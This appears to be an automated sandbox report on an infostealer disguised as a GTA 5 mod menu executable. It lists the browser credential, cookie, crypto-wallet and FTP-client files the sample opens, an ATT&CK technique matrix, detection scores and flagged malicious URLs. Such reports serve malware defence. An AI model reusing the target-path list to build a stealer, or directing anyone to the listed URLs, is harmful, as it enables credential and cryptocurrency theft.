                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: Yara matchFile source: 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GTA-5-Mod-Menu-2025.exe PID: 6216, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Screen Capture
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares31
                Data from Local System
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information
                NTDS1
                Process Discovery
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials11
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                GTA-5-Mod-Menu-2025.exe32%ReversingLabsWin32.Trojan.Generic
                GTA-5-Mod-Menu-2025.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://fancywaxxers.shop/apie100%Avira URL Cloudmalware
                https://fancywaxxers.shop/apiH$0?100%Avira URL Cloudmalware
                https://fancywaxxers.shop/api9v&?100%Avira URL Cloudmalware
